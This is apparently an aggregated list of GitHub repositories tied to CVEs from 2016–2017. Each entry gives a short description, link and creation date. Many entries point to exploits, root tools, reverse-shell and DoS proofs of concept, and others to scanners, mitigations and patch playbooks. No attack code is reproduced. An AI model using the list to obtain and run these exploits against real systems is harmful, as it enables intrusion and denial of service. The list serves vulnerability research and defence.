**Roundcube 1.0.0 <= 1.2.2 Remote Code Execution exploit and vulnerable container** : [t0kx/exploit-CVE-2016-9920](https://github.com/t0kx/exploit-CVE-2016-9920) create time: 2017-01-06T17:55:44Z

**Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)** : [theori-io/chakra-2016-11](https://github.com/theori-io/chakra-2016-11) create time: 2017-01-04T23:41:27Z

**no description** : [linhlt247/DirtyCOW_CVE-2016-5195](https://github.com/linhlt247/DirtyCOW_CVE-2016-5195) create time: 2017-01-02T16:50:49Z

**CVE-2017-5005 for Quick Heal Antivirus** : [payatu/QuickHeal](https://github.com/payatu/QuickHeal) create time: 2017-01-02T11:21:00Z

**Script to take advantage of CVE-2010-3847** : [magisterquis/cve-2010-3847](https://github.com/magisterquis/cve-2010-3847) create time: 2017-01-02T03:20:36Z

**Expolit for android (goldfish kernel v3.10.0+) on arm64 with PXN&SELinux Bypassed. Based on fi01's code.** : [a7vinx/CVE-2015-3636](https://github.com/a7vinx/CVE-2015-3636) create time: 2017-01-02T02:59:29Z

**Exploiting PHPMail with back connection (reverse shell) from the target** : [paralelo14/CVE_2016-10033](https://github.com/paralelo14/CVE_2016-10033) create time: 2016-12-29T13:49:36Z

**Prevent PHP vulnerabilities similar to CVE-2016-10033 and CVE-2016-10045.** : [Zenexer/safeshell](https://github.com/Zenexer/safeshell) create time: 2016-12-29T08:29:20Z

**Puppet module to find Vulnerability of CVE 2016 5195** : [nndhanasekaran/redhat_cve2016](https://github.com/nndhanasekaran/redhat_cve2016) create time: 2016-12-28T11:42:15Z

**CVE-2016-8610 (SSL Death Alert) PoC** : [cujanovic/CVE-2016-8610-PoC](https://github.com/cujanovic/CVE-2016-8610-PoC) create time: 2016-12-27T10:09:43Z

**PHPMailer < 5.2.18 Remote Code Execution exploit and vulnerable container** : [opsxcq/exploit-CVE-2016-10033](https://github.com/opsxcq/exploit-CVE-2016-10033) create time: 2016-12-26T13:39:03Z

**no description** : [k0keoyo/CVE-2012-0003_eXP](https://github.com/k0keoyo/CVE-2012-0003_eXP) create time: 2016-12-26T13:33:22Z

**Local privilege escalation through macOS 10.12.1 via CVE-2016-1825 or CVE-2016-7617.** : [bazad/physmem](https://github.com/bazad/physmem) create time: 2016-12-25T05:07:22Z

**Proof of concept for CVE-2016-9192.** : [serializingme/cve-2016-9192](https://github.com/serializingme/cve-2016-9192) create time: 2016-12-20T18:32:53Z

**CVE-2013-6282 proof of concept for Android** : [timwr/CVE-2013-6282](https://github.com/timwr/CVE-2013-6282) create time: 2016-12-19T16:14:18Z

**Android attempt at PoC CVE-2016-8655** : [martinmullins/CVE-2016-8655_Android](https://github.com/martinmullins/CVE-2016-8655_Android) create time: 2016-12-17T19:14:01Z

**McAfee Virus Scan for Linux multiple remote flaws (CVE 2016-8016, CVE 2016-8017, CVE 2016-8018, CVE 2016-8019, CVE 2016-8020, CVE 2016-8021, CVE 2016-8022, CVE 2016-8023, CVE 2016-8024, CVE 2016-8025)** : [opsxcq/exploit-CVE-2016-8016-25](https://github.com/opsxcq/exploit-CVE-2016-8016-25) create time: 2016-12-13T21:25:05Z

**Chocobo Root (CVE-2016-8655) Analysis** : [agkunkle/chocobo](https://github.com/agkunkle/chocobo) create time: 2016-12-09T17:45:04Z

**OpenSSH remote DOS exploit and vulnerable container** : [opsxcq/exploit-CVE-2016-6515](https://github.com/opsxcq/exploit-CVE-2016-6515) create time: 2016-12-09T15:22:38Z

**Linux af_packet.c race condition (local root)** : [KosukeShimofuji/CVE-2016-8655](https://github.com/KosukeShimofuji/CVE-2016-8655) create time: 2016-12-09T02:54:17Z

**Inspec profile for detecting CVE-2016-5195 aka Dirty COW** : [ndobson/inspec_CVE-2016-5195](https://github.com/ndobson/inspec_CVE-2016-5195) create time: 2016-12-08T22:41:51Z

**no description** : [LakshmiDesai/CVE-2016-8655](https://github.com/LakshmiDesai/CVE-2016-8655) create time: 2016-12-08T07:41:52Z

**Shellshock exploit + vulnerable environment** : [opsxcq/exploit-CVE-2014-6271](https://github.com/opsxcq/exploit-CVE-2014-6271) create time: 2016-12-07T23:38:50Z

**global rate-limiting in Linux (CVE-2016-5696) scanner** : [nogoegst/grill](https://github.com/nogoegst/grill) create time: 2016-12-07T18:40:47Z

**PoC for CVE-2016-8655 that causes a kernel panic** : [scarvell/cve-2016-8655](https://github.com/scarvell/cve-2016-8655) create time: 2016-12-07T00:51:52Z

**Exploit of the CVE-2016-1494 allowing to forge signatures of RSA keys with low exponents** : [matthiasbe/secuimag3a](https://github.com/matthiasbe/secuimag3a) create time: 2016-12-02T09:32:02Z

**Full exploit of CVE-2016-6754(BadKernel) and slide of SyScan360 2016** : [secmob/BadKernel](https://github.com/secmob/BadKernel) create time: 2016-11-28T08:44:44Z

**no description** : [shekkbuilder/CVE-2016-7434](https://github.com/shekkbuilder/CVE-2016-7434) create time: 2016-11-27T01:14:20Z

**Information about my advisory on CVE-2006-3747 (Apache mod_rewrite LDAP off-by-one buffer overflow).. At the time, it was the first public working exploit :)** : [defensahacker/CVE-2006-3747](https://github.com/defensahacker/CVE-2006-3747) create time: 2016-11-26T00:20:33Z

**NTPD remote DOS exploit and vulnerable container** : [opsxcq/exploit-CVE-2016-7434](https://github.com/opsxcq/exploit-CVE-2016-7434) create time: 2016-11-22T19:42:17Z

**这里保留着部分脏牛漏洞的利用代码** : [whu-enjoy/CVE-2016-5195](https://github.com/whu-enjoy/CVE-2016-5195) create time: 2016-11-17T02:20:09Z

**Exploit for Joomla 3.4.4 - 3.6.4 (CVE-2016-8869 and CVE-2016-8870)** : [rustyJ4ck/JoomlaCVE20168869](https://github.com/rustyJ4ck/JoomlaCVE20168869) create time: 2016-11-10T13:47:01Z

**no description** : [bluebluelan/CVE-2015-7547-proj-master](https://github.com/bluebluelan/CVE-2015-7547-proj-master) create time: 2016-11-10T08:49:13Z

**Recent Linux privilege escalation exploit** : [ldenevi/CVE-2016-5195](https://github.com/ldenevi/CVE-2016-5195) create time: 2016-11-06T14:38:04Z

**Schneider Electric Magelis HMI Resource Consumption Vulnerabilities [ICSA-16-308-02, CVE-2016-8367, CVE-2016-8374]** : [0xICF/PanelShock](https://github.com/0xICF/PanelShock) create time: 2016-11-04T14:24:15Z

**Proof of concept for CVE-2016-8858** : [dag-erling/kexkill](https://github.com/dag-erling/kexkill) create time: 2016-11-03T16:10:47Z

**Source code: https://github.com/XiphosResearch/exploits/tree/master/Joomraa** : [sunsunza2009/Joomla-3.4.4-3.6.4_CVE-2016-8869_and_CVE-2016-8870](https://github.com/sunsunza2009/Joomla-3.4.4-3.6.4_CVE-2016-8869_and_CVE-2016-8870) create time: 2016-11-02T14:35:58Z

**no description** : [firebroo/CVE-2016-6663](https://github.com/firebroo/CVE-2016-6663) create time: 2016-11-02T02:05:45Z

**no description** : [hittlle/CVE-2011-1974-PoC](https://github.com/hittlle/CVE-2011-1974-PoC) create time: 2016-11-01T08:08:09Z

**no description** : [oleg-fiksel/ansible_CVE-2016-5195_check](https://github.com/oleg-fiksel/ansible_CVE-2016-5195_check) create time: 2016-10-29T19:15:20Z

**Scan vuls kernel CVE-2016-5195 - DirtyCow** : [aishee/scan-dirtycow](https://github.com/aishee/scan-dirtycow) create time: 2016-10-29T08:45:45Z

**Pixel bootlaoder exploit for reading flash storage** : [CunningLogic/PixelDump_CVE-2016-8462](https://github.com/CunningLogic/PixelDump_CVE-2016-8462) create time: 2016-10-28T16:26:18Z

**no description** : [followboy1999/CVE-2008-7220](https://github.com/followboy1999/CVE-2008-7220) create time: 2016-10-28T08:30:36Z

**Check the Browser's FlashPlayer version to check if it is vulnerable to exploit CVE-2016-7855** : [swagatbora90/CheckFlashPlayerVersion](https://github.com/swagatbora90/CheckFlashPlayerVersion) create time: 2016-10-26T19:53:29Z

**String MVC Framework Path-Traversal proof of concept. CVE-2014-3625** : [gforresu/SpringPathTraversal](https://github.com/gforresu/SpringPathTraversal) create time: 2016-10-26T16:51:00Z

**Universal Android root tool based on CVE-2016-5195. Watch this space.** : [DavidBuchanan314/cowroot](https://github.com/DavidBuchanan314/cowroot) create time: 2016-10-24T12:35:55Z

**A CVE-2016-5195 exploit example.** : [gbonacini/CVE-2016-5195](https://github.com/gbonacini/CVE-2016-5195) create time: 2016-10-23T00:16:33Z

**PoC for Dirty COW (CVE-2016-5195)** : [scumjr/dirtycow-vdso](https://github.com/scumjr/dirtycow-vdso) create time: 2016-10-22T15:25:34Z

**Dirty COW (CVE-2016-5195) vulnerability testing utility for Linux-based systems.** : [sideeffect42/DirtyCOWTester](https://github.com/sideeffect42/DirtyCOWTester) create time: 2016-10-22T07:51:18Z

**Mitigates CVE-2016-5195 aka DirtyCOW** : [pgporada/ansible-role-cve](https://github.com/pgporada/ansible-role-cve) create time: 2016-10-22T00:00:01Z

**Ansible playbook to mitigate CVE-2016-5195 on CentOS** : [istenrot/centos-dirty-cow-ansible](https://github.com/istenrot/centos-dirty-cow-ansible) create time: 2016-10-21T20:32:05Z

**CVE-2016-5195 exploit written in Crystal** : [xlucas/dirtycow.cr](https://github.com/xlucas/dirtycow.cr) create time: 2016-10-21T15:54:10Z

**CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android** : [timwr/CVE-2016-5195](https://github.com/timwr/CVE-2016-5195) create time: 2016-10-21T11:19:21Z

**no description** : [ASRTeam/CVE-2016-5195](https://github.com/ASRTeam/CVE-2016-5195) create time: 2016-10-21T06:06:05Z

**Dirty Cow** : [KosukeShimofuji/CVE-2016-5195](https://github.com/KosukeShimofuji/CVE-2016-5195) create time: 2016-10-21T05:30:17Z

**Proof-of-Concept CVE-2016-0199** : [LeoonZHANG/CVE-2016-0199](https://github.com/LeoonZHANG/CVE-2016-0199) create time: 2016-10-16T16:03:54Z

**CVE-2016-7117** : [KosukeShimofuji/CVE-2016-7117](https://github.com/KosukeShimofuji/CVE-2016-7117) create time: 2016-10-14T01:08:34Z

**Reproducible exploits for: CVE-2016-1240 CVE-2008-2938 CVE-2014-2064 CVE-2014-1904** : [Naramsim/Offensive](https://github.com/Naramsim/Offensive) create time: 2016-10-13T13:46:46Z

**PoC of cve-2015-3839 which cause SMS app of Android Crash (DoS)** : [mabin004/cve-2015-3839_PoC](https://github.com/mabin004/cve-2015-3839_PoC) create time: 2016-10-11T12:58:57Z

**PoC exploit for CVE-2016-4622** : [saelo/jscpwn](https://github.com/saelo/jscpwn) create time: 2016-10-09T15:22:06Z

**OS X 10.11.6 LPE PoC for CVE-2016-4655 / CVE-2016-4656** : [jndok/PegasusX](https://github.com/jndok/PegasusX) create time: 2016-10-02T12:42:14Z

**just some research notes** : [HenryVHuang/CVE-2015-3864](https://github.com/HenryVHuang/CVE-2015-3864) create time: 2016-09-30T03:39:14Z

**CVE-2016-2776** : [infobyte/CVE-2016-2776](https://github.com/infobyte/CVE-2016-2776) create time: 2016-09-30T00:40:44Z

**no description** : [KosukeShimofuji/CVE-2016-2776](https://github.com/KosukeShimofuji/CVE-2016-2776) create time: 2016-09-28T10:07:24Z

**exp for cve-2014-7911 which can get system privillage** : [mabin004/cve-2014-7911](https://github.com/mabin004/cve-2014-7911) create time: 2016-09-28T07:56:07Z

**no description** : [whiteHat001/cve-2010-3333](https://github.com/whiteHat001/cve-2010-3333) create time: 2016-09-26T07:35:41Z

**CVE-2012-0152** : [rutvijjethwa/RDP_jammer](https://github.com/rutvijjethwa/RDP_jammer) create time: 2016-09-26T06:08:09Z

**这里保存着我学习CVE-2012-1889这个漏洞的利用所用到的文件** : [whu-enjoy/CVE-2012-1889](https://github.com/whu-enjoy/CVE-2012-1889) create time: 2016-09-25T06:31:21Z

**Public repository for improvements to the EXTRABACON exploit** : [RiskSense-Ops/CVE-2016-6366](https://github.com/RiskSense-Ops/CVE-2016-6366) create time: 2016-09-20T23:19:02Z

**0ldSQL_MySQL_RCE_exploit.py (ver. 1.0) (CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit For testing purposes only. Do no harm.** : [Ashrafdev/MySQL-Remote-Root-Code-Execution](https://github.com/Ashrafdev/MySQL-Remote-Root-Code-Execution) create time: 2016-09-20T08:03:40Z

**Use CVE-2016-3308 corrupt win32k desktop heap** : [55-AA/CVE-2016-3308](https://github.com/55-AA/CVE-2016-3308) create time: 2016-09-18T03:48:53Z

**A PoC of KNOXout (CVE-2016-6584) - bypassing Samsung KNOX protections and root Samsung Galaxy S6 Android Device.** : [ViralSecurityGroup/KNOXout](https://github.com/ViralSecurityGroup/KNOXout) create time: 2016-09-16T07:34:50Z

**Research CVE-2016-4861** : [KosukeShimofuji/CVE-2016-4861](https://github.com/KosukeShimofuji/CVE-2016-4861) create time: 2016-09-16T04:25:35Z

**research CVE-2016-6662** : [KosukeShimofuji/CVE-2016-6662](https://github.com/KosukeShimofuji/CVE-2016-6662) create time: 2016-09-16T04:21:19Z

**Simple ansible playbook to patch mysql servers against CVE-2016-6662** : [meersjo/ansible-mysql-cve-2016-6662](https://github.com/meersjo/ansible-mysql-cve-2016-6662) create time: 2016-09-15T15:12:32Z

**MySQL server CVE-2016-6662 patch playbook** : [konstantin-kelemen/mysqld_safe-CVE-2016-6662-patch](https://github.com/konstantin-kelemen/mysqld_safe-CVE-2016-6662-patch) create time: 2016-09-14T13:12:21Z

**Verification tools for CVE-2016-1287** : [NetSPI/asa_tools](https://github.com/NetSPI/asa_tools) create time: 2016-09-08T19:43:18Z

**Simple script to exploit open redirection vulnerability in Rockwell ControlLogix 1756-ENBT/A** : [akbarq/CVE-2009-0473-check](https://github.com/akbarq/CVE-2009-0473-check) create time: 2016-09-05T23:08:29Z

**翻译文章,CVE-2015-0057漏洞在32位和64位系统上的利用。Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE 2015-0057) bug on both 32-bit and 64-bit(Aaron Adams of NCC )** : [55-AA/CVE-2015-0057](https://github.com/55-AA/CVE-2015-0057) create time: 2016-08-30T06:11:59Z

**CVE-2014-6332 ZeroDay POC - Starts PowerShell** : [mourr/CVE-2014-6332](https://github.com/mourr/CVE-2014-6332) create time: 2016-08-29T17:13:07Z

**Daemon to randomize tcp_challenge_ack_limit to prevent side channel attacks CVE-2016-5696** : [bplinux/chackd](https://github.com/bplinux/chackd) create time: 2016-08-26T16:11:03Z

**Reading Course Report** : [shajinzheng/cve-2016-5699-jinzheng-sha](https://github.com/shajinzheng/cve-2016-5699-jinzheng-sha) create time: 2016-08-23T03:06:22Z

**Proof-of-concept exploit code for CVE-2016-5696** : [jduck/challack](https://github.com/jduck/challack) create time: 2016-08-23T00:21:18Z

**Proof of concept for CSRF vulnerability(CVE-2016-4825) on IO-DATA Recording Hard Disc Drive** : [kaito834/cve-2016-4845_csrf](https://github.com/kaito834/cve-2016-4845_csrf) create time: 2016-08-21T07:32:19Z

**Proof of Concept code for CVE-2016-5696** : [violentshell/rover](https://github.com/violentshell/rover) create time: 2016-08-21T00:17:20Z

**A PoC demonstrating techniques exploiting CVE-2016-5696 Off-Path TCP Exploits: Global Rate Limit Considered Dangerous** : [Gnoxter/mountain_goat](https://github.com/Gnoxter/mountain_goat) create time: 2016-08-20T23:28:41Z

**OpenSSHD 7.2p2 - User Enumeration: CVE 2016-6210** : [calebshortt/opensshd_user_enumeration](https://github.com/calebshortt/opensshd_user_enumeration) create time: 2016-08-03T16:13:31Z

**no description** : [edmondscommerce/CVE-2011-2461_Magento_Patch](https://github.com/edmondscommerce/CVE-2011-2461_Magento_Patch) create time: 2016-07-26T14:02:15Z

**linux 提权** : [pythonone/CVE-2012-0056](https://github.com/pythonone/CVE-2012-0056) create time: 2016-07-22T13:50:40Z

**This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service or execute arbitrary code.** : [shauntdergrigorian/cve-2006-6184](https://github.com/shauntdergrigorian/cve-2006-6184) create time: 2016-07-21T22:43:43Z

**Disables ImageIO TIFF support to protect against CVE-2016-4631** : [hansnielsen/tiffdisabler](https://github.com/hansnielsen/tiffdisabler) create time: 2016-07-20T06:47:07Z

**Attempts to leverage CVE 2016-6210 to enumerate valid users on a given OpenSSH server. All credit to Eddie Harari on the list for disclosure and initial PoC - I'm just making it work in cases where you have a bunch (dozens/hundreds) of servers to test ASAP.** : [bassitone/OpenSSH-User-Enumeration](https://github.com/bassitone/OpenSSH-User-Enumeration) create time: 2016-07-19T16:53:17Z

**CVE-2016-3962-Exploit** : [securifera/CVE-2016-3962-Exploit](https://github.com/securifera/CVE-2016-3962-Exploit) create time: 2016-07-17T18:43:56Z

**root with CVE-2015-3636** : [debugfan/rattle_root](https://github.com/debugfan/rattle_root) create time: 2016-07-13T06:23:54Z

**no description** : [KosukeShimofuji/CVE-2016-5734](https://github.com/KosukeShimofuji/CVE-2016-5734) create time: 2016-07-08T09:43:26Z

**no description** : [irain1987/cve-2014-9707](https://github.com/irain1987/cve-2014-9707) create time: 2016-07-07T12:27:56Z

**no description** : [jianqiangzhao/CVE-2016-2434](https://github.com/jianqiangzhao/CVE-2016-2434) create time: 2016-07-05T10:46:34Z

**JBoss Autopwn CVE-2010-0738 JBoss authentication bypass** : [gitcollect/jboss-autopwn](https://github.com/gitcollect/jboss-autopwn) create time: 2016-07-02T15:17:07Z

**CVE-2016-4971 written in nodejs** : [gitcollect/CVE-2016-4971](https://github.com/gitcollect/CVE-2016-4971) create time: 2016-07-02T14:44:48Z

**Buildable Poc of CVE-2016-2468 based on http://retme.net/index.php/2016/06/12/CVE-2016-2468.html** : [gitcollect/CVE-2016-2468](https://github.com/gitcollect/CVE-2016-2468) create time: 2016-07-02T14:37:31Z

**Exploit that extracts Qualcomm's KeyMaster keys using CVE-2015-6639 and CVE-2016-2431** : [laginimaineb/ExtractKeyMaster](https://github.com/laginimaineb/ExtractKeyMaster) create time: 2016-06-30T11:56:44Z

**no description** : [FloatingGuy/cve-2015-1805](https://github.com/FloatingGuy/cve-2015-1805) create time: 2016-06-30T02:13:26Z

**对CVE-2016-0189漏洞补丁的分析** : [deamwork/MS16-051-poc](https://github.com/deamwork/MS16-051-poc) create time: 2016-06-25T01:48:38Z

**CVE-2016-4971 written in nodejs** : [BlueCocoa/CVE-2016-4971](https://github.com/BlueCocoa/CVE-2016-4971) create time: 2016-06-24T21:59:33Z

**PoC code of CVE-2016-5699 Vulnerability** : [bunseokbot/CVE-2016-5699-poc](https://github.com/bunseokbot/CVE-2016-5699-poc) create time: 2016-06-23T14:01:20Z

**Proof-of-Concept exploit for CVE-2016-0189 (VBScript Memory Corruption in IE11)** : [theori-io/cve-2016-0189](https://github.com/theori-io/cve-2016-0189) create time: 2016-06-22T23:03:30Z

**CVE-2016-0051 样本库** : [ganrann/CVE-2016-0051](https://github.com/ganrann/CVE-2016-0051) create time: 2016-06-16T14:08:43Z

**no description** : [jason3e7/CVE-2016-4438](https://github.com/jason3e7/CVE-2016-4438) create time: 2016-06-16T06:28:55Z

**Qualcomm TrustZone kernel privilege escalation** : [laginimaineb/cve-2016-2431](https://github.com/laginimaineb/cve-2016-2431) create time: 2016-06-15T11:21:24Z

**Docker container implementing tests for CVE-2016-2107 - LuckyNegative20** : [tmiklas/docker-cve-2016-2107](https://github.com/tmiklas/docker-cve-2016-2107) create time: 2016-06-09T16:01:03Z

**no description** : [thejackerz/scanner-exploit-joomla-CVE-2015-8562](https://github.com/thejackerz/scanner-exploit-joomla-CVE-2015-8562) create time: 2016-06-07T14:56:26Z

**A PoC of CVE-2016-2098 (rails4.2.5.1 / view render)** : [CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42](https://github.com/CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42) create time: 2016-06-07T12:59:31Z

**no description** : [Manouchehri/CVE-2016-1734](https://github.com/Manouchehri/CVE-2016-1734) create time: 2016-06-03T05:37:06Z

**MySQL DoS in the Procedure Analyse Function – CVE-2015-4870** : [OsandaMalith/CVE-2015-4870](https://github.com/OsandaMalith/CVE-2015-4870) create time: 2016-05-30T04:18:12Z

**towelroot** : [c3c/CVE-2014-3153](https://github.com/c3c/CVE-2014-3153) create time: 2016-05-29T18:39:15Z

**Magento Unauthorized Remote Code Execution (CVE-2016-4010)** : [brianwrf/Magento-CVE-2016-4010](https://github.com/brianwrf/Magento-CVE-2016-4010) create time: 2016-05-25T07:52:28Z

**Local privilege escalation for OS X 10.10.5 via CVE-2016-1828.** : [bazad/rootsh](https://github.com/bazad/rootsh) create time: 2016-05-18T03:49:02Z

**Test modified buggy poc** : [zsaurus/CVE-2016-0801-test](https://github.com/zsaurus/CVE-2016-0801-test) create time: 2016-05-15T03:55:27Z

**Microsoft Office / COM Object DLL Planting** : [hexx0r/CVE-2015-6132](https://github.com/hexx0r/CVE-2015-6132) create time: 2016-05-14T14:17:15Z

**no description** : [abdsec/CVE-2016-0801](https://github.com/abdsec/CVE-2016-0801) create time: 2016-05-11T04:36:45Z

**3.8+ linux root exploit** : [bjzz/cve_2016_0728_exploit](https://github.com/bjzz/cve_2016_0728_exploit) create time: 2016-05-11T02:33:41Z

**no description** : [hexx0r/CVE-2016-0051](https://github.com/hexx0r/CVE-2016-0051) create time: 2016-05-08T06:22:07Z

**NSE plugin for Nmap that scans a DotNetNuke (DNN) web application for an Administration Authentication Bypass vulnerability (CVE-2015-2794, EDB-ID: 39777).** : [styx00/DNN_CVE-2015-2794](https://github.com/styx00/DNN_CVE-2015-2794) create time: 2016-05-07T12:21:13Z

**ImaegMagick Code Execution (CVE-2016-3714)** : [Hood3dRob1n/CVE-2016-3714](https://github.com/Hood3dRob1n/CVE-2016-3714) create time: 2016-05-07T08:21:27Z

**Sockstress (CVE-2008-4609) DDoS implementation written in Go** : [marcelki/sockstress](https://github.com/marcelki/sockstress) create time: 2016-05-06T17:21:32Z

**no description** : [jpeanut/ImageTragick-CVE-2016-3714-RShell](https://github.com/jpeanut/ImageTragick-CVE-2016-3714-RShell) create time: 2016-05-05T18:16:52Z

**Blind SQL injection brute force.** : [KyomaHooin/CVE-2008-6970](https://github.com/KyomaHooin/CVE-2008-6970) create time: 2016-05-05T14:13:33Z

**Fix ImageMagick Command Injection (CVE-2016-3714) with Ansible.** : [chusiang/CVE-2016-3714.ansible.role](https://github.com/chusiang/CVE-2016-3714.ansible.role) create time: 2016-05-05T11:05:20Z

**no description** : [tommiionfire/CVE-2016-3714](https://github.com/tommiionfire/CVE-2016-3714) create time: 2016-05-04T09:47:42Z

**a puppet module in response to CVE-2016-3714** : [jackdpeterson/imagick_secure_puppet](https://github.com/jackdpeterson/imagick_secure_puppet) create time: 2016-05-04T04:30:25Z

**Simple test for the May 2016 OpenSSL padding oracle (CVE-2016-2107)** : [FiloSottile/CVE-2016-2107](https://github.com/FiloSottile/CVE-2016-2107) create time: 2016-05-03T16:47:32Z

**Proof of Concepts for CVE-2016–3714** : [ImageTragick/PoCs](https://github.com/ImageTragick/PoCs) create time: 2016-05-03T05:43:08Z

**no description** : [securifera/CVE-2015-8277-Exploit](https://github.com/securifera/CVE-2015-8277-Exploit) create time: 2016-05-02T13:47:15Z

**QSEE Privilege Escalation Exploit using PRDiag* commands (CVE-2015-6639)** : [laginimaineb/cve-2015-6639](https://github.com/laginimaineb/cve-2015-6639) create time: 2016-05-02T12:18:57Z

**no description** : [sin4ts/CVE2014-3153](https://github.com/sin4ts/CVE2014-3153) create time: 2016-05-01T20:13:04Z

**[Firefox] SOP bypass PoC for CVE-2015-7214 (MFSA 2015-149)** : [llamakko/CVE-2015-7214](https://github.com/llamakko/CVE-2015-7214) create time: 2016-04-28T12:54:24Z

**Exploit code for CVE-2016-1757** : [gdbinit/mach_race](https://github.com/gdbinit/mach_race) create time: 2016-04-27T12:29:28Z

**CVE-2016-3141** : [peternguyen93/CVE-2016-3141](https://github.com/peternguyen93/CVE-2016-3141) create time: 2016-04-21T08:59:05Z

**no description** : [b0b0505/CVE-2016-0846-PoC](https://github.com/b0b0505/CVE-2016-0846-PoC) create time: 2016-04-19T12:56:44Z

**An example detection and remediation policy.** : [nickanderson/cfengine-CVE-2016-2118](https://github.com/nickanderson/cfengine-CVE-2016-2118) create time: 2016-04-17T22:22:04Z

**POC for CVE 2016-0752** : [julianmunoz/Rails-Dynamic-Render-vuln](https://github.com/julianmunoz/Rails-Dynamic-Render-vuln) create time: 2016-04-17T00:08:23Z

**这个代码包含了CVE-2015-8660漏洞的利用代码,还有注释,出现问题的源代码,打了补丁后的代码** : [whu-enjoy/CVE-2015-8660](https://github.com/whu-enjoy/CVE-2015-8660) create time: 2016-04-14T15:09:19Z

**no description** : [bittorrent3389/CVE-2015-8543_for_SLE12SP1](https://github.com/bittorrent3389/CVE-2015-8543_for_SLE12SP1) create time: 2016-04-12T11:57:27Z

**Analysis of CVE-2016-3959 and a Proof of Concept Attack Against a Go SSH Server.** : [alexmullins/dsa](https://github.com/alexmullins/dsa) create time: 2016-04-10T01:35:27Z

**Extraction of iMessage Data via XSS** : [moloch--/cve-2016-1764](https://github.com/moloch--/cve-2016-1764) create time: 2016-04-08T15:45:44Z

**arbitrary memory read/write by IMemroy OOB** : [secmob/CVE-2016-0846](https://github.com/secmob/CVE-2016-0846) create time: 2016-04-08T05:09:15Z

**no description** : [hulovebin/cve-2016-0805](https://github.com/hulovebin/cve-2016-0805) create time: 2016-04-06T00:59:43Z

**PoC attack server for CVE-2015-7547 buffer overflow vulnerability in glibc DNS stub resolver (public version)** : [eSentire/cve-2015-7547-public](https://github.com/eSentire/cve-2015-7547-public) create time: 2016-04-05T13:50:28Z

**CVE-2015-1805 root tool** : [dosomder/iovyroot](https://github.com/dosomder/iovyroot) create time: 2016-04-01T12:10:14Z

**OkHttp sample app vulnerable to CVE-2016-2402** : [ikoz/certPinningVulnerableOkHttp](https://github.com/ikoz/certPinningVulnerableOkHttp) create time: 2016-03-30T23:45:06Z

**Infoleak and PC control poc for CVE-2015-6620 (24445127), I'll add after conference** : [flankerhqd/mediacodecoob](https://github.com/flankerhqd/mediacodecoob) create time: 2016-03-29T09:01:52Z

**CVE-2016-5636** : [insuyun/CVE-2016-5636](https://github.com/insuyun/CVE-2016-5636) create time: 2016-03-28T18:47:03Z

**no description** : [panyu6325/CVE-2015-1805](https://github.com/panyu6325/CVE-2015-1805) create time: 2016-03-24T02:55:09Z

**Exploitation Training -- CVE-2013-2028: Nginx Stack Based Buffer Overflow** : [kitctf/nginxpwn](https://github.com/kitctf/nginxpwn) create time: 2016-03-23T10:41:00Z

**must run this native binary with system privilege** : [koozxcv/CVE-2014-4322](https://github.com/koozxcv/CVE-2014-4322) create time: 2016-03-23T03:29:27Z

**CVE-2014-7911 vulnerability and CVE-2014-4322 vulnerability to get root privilege!** : [koozxcv/CVE-2014-7911-CVE-2014-4322_get_root_privilege](https://github.com/koozxcv/CVE-2014-7911-CVE-2014-4322_get_root_privilege) create time: 2016-03-23T03:21:11Z

**vulnerabilities‘ Poc and Exploit** : [koozxcv/CVE-2014-7911](https://github.com/koozxcv/CVE-2014-7911) create time: 2016-03-22T02:02:11Z

**Cve-2015-1538-1** : [niranjanshr13/Stagefright-cve-2015-1538-1](https://github.com/niranjanshr13/Stagefright-cve-2015-1538-1) create time: 2016-03-20T20:20:06Z

**Simple script for testing CVE-2016-2402 and similar flaws** : [ikoz/cert-pinning-flaw-poc](https://github.com/ikoz/cert-pinning-flaw-poc) create time: 2016-03-20T18:04:40Z

**Dropbear user enumeration (CVE-2013-4434) PoC** : [styx00/Dropbear_CVE-2013-4434](https://github.com/styx00/Dropbear_CVE-2013-4434) create time: 2016-03-20T15:06:29Z

**no description** : [dachidahu/CVE-2016-0752](https://github.com/dachidahu/CVE-2016-0752) create time: 2016-03-18T21:10:18Z

**Windows/Linux reproducer** : [Karm/CVE-2015-8710](https://github.com/Karm/CVE-2015-8710) create time: 2016-03-17T10:32:52Z

**a exploit for cve-2016-0728** : [bittorrent3389/cve-2016-0728](https://github.com/bittorrent3389/cve-2016-0728) create time: 2016-03-15T04:52:40Z

**PoC exploit server for CVE-2015-7547** : [jgajek/cve-2015-7547](https://github.com/jgajek/cve-2015-7547) create time: 2016-03-10T19:47:00Z

**CVE-2015-8299 Advisory and PoC** : [kernoelpanic/CVE-2015-8299](https://github.com/kernoelpanic/CVE-2015-8299) create time: 2016-03-08T12:19:50Z

**exploit for CVE-2015-0568** : [betalphafai/CVE-2015-0568](https://github.com/betalphafai/CVE-2015-0568) create time: 2016-03-04T10:00:46Z

**Python script to exploit CVE-2015-4852.** : [roo7break/serialator](https://github.com/roo7break/serialator) create time: 2016-03-03T18:33:17Z

**Proof of concept showing how CVE-2016-2098 leads to remote code execution** : [hderms/dh-CVE_2016_2098](https://github.com/hderms/dh-CVE_2016_2098) create time: 2016-03-01T17:45:29Z

**cve-2014-7920-7921 exploit update** : [Vinc3nt4H/cve-2014-7920-7921_update](https://github.com/Vinc3nt4H/cve-2014-7920-7921_update) create time: 2016-02-29T05:07:17Z

**Exploiting CVE-2016-0040 uninitialized pointer** : [Rootkitsmm-zz/cve-2016-0040](https://github.com/Rootkitsmm-zz/cve-2016-0040) create time: 2016-02-26T18:00:30Z

**CVE-2015-0235** : [alanmeyer/CVE-glibc](https://github.com/alanmeyer/CVE-glibc) create time: 2016-02-25T23:23:34Z

**no description** : [Elm0D/CVE-2017-8464](https://github.com/Elm0D/CVE-2017-8464) create time: 2016-02-24T17:36:29Z

**glibc getaddrinfo stack-based buffer overflow** : [babykillerblack/CVE-2015-7547](https://github.com/babykillerblack/CVE-2015-7547) create time: 2016-02-21T20:21:43Z

